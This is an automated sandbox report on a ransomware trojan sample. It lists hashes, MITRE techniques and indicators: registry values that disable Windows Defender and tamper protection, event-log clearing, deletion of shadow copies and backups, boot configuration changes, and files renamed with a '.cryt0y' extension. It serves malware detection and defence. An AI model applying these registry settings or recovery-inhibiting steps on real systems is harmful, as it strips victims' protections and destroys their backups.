fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997

Analysis

max time kernel
172s
max time network
175s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24/09/2022, 09:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Size

555KB
MD5

2102422fdf58e1f1ea628e864576f437
SHA1

a071690fa220c12e9b5fa85e70dc3e7c42b30893
SHA256

fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997
SHA512

9894a54a6c85ce3e087ef6f2a6da1a5744d71667eaa8f17d23985e15c39a425cfe53f838875573e828170ce6d3756618c4b293e3d81dfc7a7a5570daf2c0c2b6
SSDEEP

12288:gfp3lxis8EdrQso5hnyRIAPQJno5hnyRIAQg:gfp36sN5snUPjnUQg

Score

10^/10

agilenet evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	mesthh4q.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	mesthh4q.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	mesthh4q.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	mesthh4q.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
2288	wevtutil.exe
1488	wevtutil.exe
4892	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4352	bcdedit.exe
1760	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5088	wbadmin.exe

Executes dropped EXE 1 IoCs

pid	Process
2488	mesthh4q.exe

Modifies extensions of user files 11 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\BackupEnable.png => C:\Users\Admin\Pictures\BackupEnable.png.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\DisconnectOpen.tif => C:\Users\Admin\Pictures\DisconnectOpen.tif.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\ShowMount.crw => C:\Users\Admin\Pictures\ShowMount.crw.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\SplitRead.tif => C:\Users\Admin\Pictures\SplitRead.tif.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\CompleteUndo.tif => C:\Users\Admin\Pictures\CompleteUndo.tif.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\ImportRestore.crw => C:\Users\Admin\Pictures\ImportRestore.crw.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\MoveRestore.png => C:\Users\Admin\Pictures\MoveRestore.png.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\RevokeGroup.raw => C:\Users\Admin\Pictures\RevokeGroup.raw.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\SyncPublish.raw => C:\Users\Admin\Pictures\SyncPublish.raw.cryt0y	mesthh4q.exe
File renamed	C:\Users\Admin\Pictures\TestDeny.crw => C:\Users\Admin\Pictures\TestDeny.crw.cryt0y	mesthh4q.exe

Loads dropped DLL 1 IoCs

pid	Process
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/3524-132-0x00000000002F0000-0x000000000037E000-memory.dmp	agile_net
behavioral2/files/0x0007000000022e4e-141.dat	agile_net
behavioral2/files/0x0007000000022e4e-140.dat	agile_net
behavioral2/memory/2488-142-0x0000000000E20000-0x0000000000E96000-memory.dmp	agile_net

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	mesthh4q.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-125_contrast-black.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LibrarySquare150x150Logo.scale-100_contrast-black.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\WideTile.scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.altform-unplated_targetsize-24.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\197.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-explorer.xml	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF	mesthh4q.exe
File opened for modification	C:\Program Files\DisconnectNew.m4a	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\Maple.gif	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageSmallTile.scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-125_contrast-black.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.contrast-black_scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsLargeTile.scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\184.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_altform-lightunplated.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-125_contrast-black.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL086.XML	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\THMBNAIL.PNG	mesthh4q.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\MedTile.scale-125_contrast-black.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-200_contrast-high.png	mesthh4q.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML	mesthh4q.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\MedTile.scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-125_contrast-black.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_SplashScreen.scale-100.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL097.XML	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png	mesthh4q.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\uninstall.log	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-200.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Images\contrast-black\Settings.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-24_altform-lightunplated.png	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub_eula.txt	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\LibrarySquare71x71Logo.scale-125_contrast-white.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx	mesthh4q.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\PREVIEW.GIF	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-125.png	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	mesthh4q.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MediumTile.scale-125_contrast-black.png	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html	mesthh4q.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml	mesthh4q.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3936	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1264	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: SeDebugPrivilege	3524	HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2488	mesthh4q.exe
Token: SeDebugPrivilege	2488	mesthh4q.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeBackupPrivilege	176	vssvc.exe
Token: SeRestorePrivilege	176	vssvc.exe
Token: SeAuditPrivilege	176	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4564	WMIC.exe
Token: SeSecurityPrivilege	4564	WMIC.exe
Token: SeTakeOwnershipPrivilege	4564	WMIC.exe
Token: SeLoadDriverPrivilege	4564	WMIC.exe
Token: SeSystemProfilePrivilege	4564	WMIC.exe
Token: SeSystemtimePrivilege	4564	WMIC.exe
Token: SeProfSingleProcessPrivilege	4564	WMIC.exe
Token: SeIncBasePriorityPrivilege	4564	WMIC.exe
Token: SeCreatePagefilePrivilege	4564	WMIC.exe
Token: SeBackupPrivilege	4564	WMIC.exe
Token: SeRestorePrivilege	4564	WMIC.exe
Token: SeShutdownPrivilege	4564	WMIC.exe
Token: SeDebugPrivilege	4564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4564	WMIC.exe
Token: SeRemoteShutdownPrivilege	4564	WMIC.exe
Token: SeUndockPrivilege	4564	WMIC.exe
Token: SeManageVolumePrivilege	4564	WMIC.exe
Token: 33	4564	WMIC.exe
Token: 34	4564	WMIC.exe
Token: 35	4564	WMIC.exe
Token: 36	4564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4564	WMIC.exe
Token: SeSecurityPrivilege	4564	WMIC.exe
Token: SeTakeOwnershipPrivilege	4564	WMIC.exe
Token: SeLoadDriverPrivilege	4564	WMIC.exe
Token: SeSystemProfilePrivilege	4564	WMIC.exe
Token: SeSystemtimePrivilege	4564	WMIC.exe
Token: SeProfSingleProcessPrivilege	4564	WMIC.exe
Token: SeIncBasePriorityPrivilege	4564	WMIC.exe
Token: SeCreatePagefilePrivilege	4564	WMIC.exe
Token: SeBackupPrivilege	4564	WMIC.exe
Token: SeRestorePrivilege	4564	WMIC.exe
Token: SeShutdownPrivilege	4564	WMIC.exe
Token: SeDebugPrivilege	4564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4564	WMIC.exe
Token: SeRemoteShutdownPrivilege	4564	WMIC.exe
Token: SeUndockPrivilege	4564	WMIC.exe
Token: SeManageVolumePrivilege	4564	WMIC.exe
Token: 33	4564	WMIC.exe
Token: 34	4564	WMIC.exe
Token: 35	4564	WMIC.exe
Token: 36	4564	WMIC.exe
Token: SeSecurityPrivilege	2288	wevtutil.exe
Token: SeBackupPrivilege	2288	wevtutil.exe
Token: SeSecurityPrivilege	1488	wevtutil.exe
Token: SeBackupPrivilege	1488	wevtutil.exe
Token: SeSecurityPrivilege	4892	wevtutil.exe
Token: SeBackupPrivilege	4892	wevtutil.exe
Token: SeBackupPrivilege	4712	wbengine.exe
